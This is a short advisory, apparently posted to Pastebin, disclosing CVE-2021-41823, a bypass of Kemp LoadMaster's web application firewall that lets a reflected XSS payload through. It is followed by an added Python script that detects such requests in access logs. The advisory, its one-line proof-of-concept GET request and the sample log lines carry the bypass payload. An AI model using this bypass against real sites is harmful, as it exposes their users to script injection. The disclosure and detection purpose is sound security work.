
CVE-2021-41823: Kemp Web Application Firewall - Pastebin.com

The Web Application Firewall (WAF) in Kemp LoadMaster 7.2.54.1 allows certain uses of onmouseover to bypass an XSS protection mechanism.


a guest

Dec 30th, 2022


1. ADVISORY INFORMATION
=======================

Product: Kemp Web Application Firewall

Vendor URL: https://kemptechnologies.com/en/solutions/waf

Version: 7.2.54.1

Type: Bypass XSS WAF protection

Date published: 2022-12-30

CVE: CVE-2021-41823

2. VULNERABILITY DETAILS
========================

The Kemp WAF allows bypassing its XSS protection and injecting the following reflected XSS payload: "onmouseover=’promt()"

3. PROOF OF CONCEPT
===================

GET /directory/vulnerable-xss.html"onmouseover=’promt()" HTTP/1.1
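Because the WAF passes this request through, the backend access log is where it can still be spotted. The following is an added detection example, not part of the original advisory or of any Kemp tooling: it flags request targets in which a quote character is followed by an inline on* event-handler attribute. The log layout, the sample lines and the function names are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

# Request line of an access-log entry: "METHOD target HTTP/x.y".
# The target is matched greedily so quotes inside it do not end the match early.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/\d(?:\.\d)?"')

# A straight or typographic quote followed by an inline event-handler attribute.
HANDLER_RE = re.compile(r'''["'\u2018\u2019\u201c\u201d][\s/]*on[a-z]+\s*=''', re.IGNORECASE)

def decode_target(target, max_rounds=3):
    """Percent-decode repeatedly so double-encoded targets are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def suspicious_requests(lines):
    """Return (line_number, decoded_target) for requests whose target closes an
    attribute with a quote and then supplies an on* event handler."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = decode_target(match.group("target"))
        if HANDLER_RE.search(target):
            hits.append((number, target))
    return hits

# Constructed sample log (documentation addresses). Line 2 carries the advisory's
# request as written; line 3 is the same request as a client would percent-encode it.
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Dec/2022:10:00:01 +0000] "GET /directory/index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/Dec/2022:10:00:02 +0000] "GET /directory/vulnerable-xss.html"onmouseover=’promt()" HTTP/1.1" 200 734',
    '198.51.100.8 - - [30/Dec/2022:10:00:03 +0000] "GET /directory/vulnerable-xss.html%22onmouseover=%E2%80%99promt()%22 HTTP/1.1" 200 734',
    '198.51.100.9 - - [30/Dec/2022:10:00:04 +0000] "GET /shop?onsale=true&q=%22laptop%22 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, target in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {target}")
```

Servers that escape quotes in their logs (for example as \x22) need that escaping undone before this check is applied.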
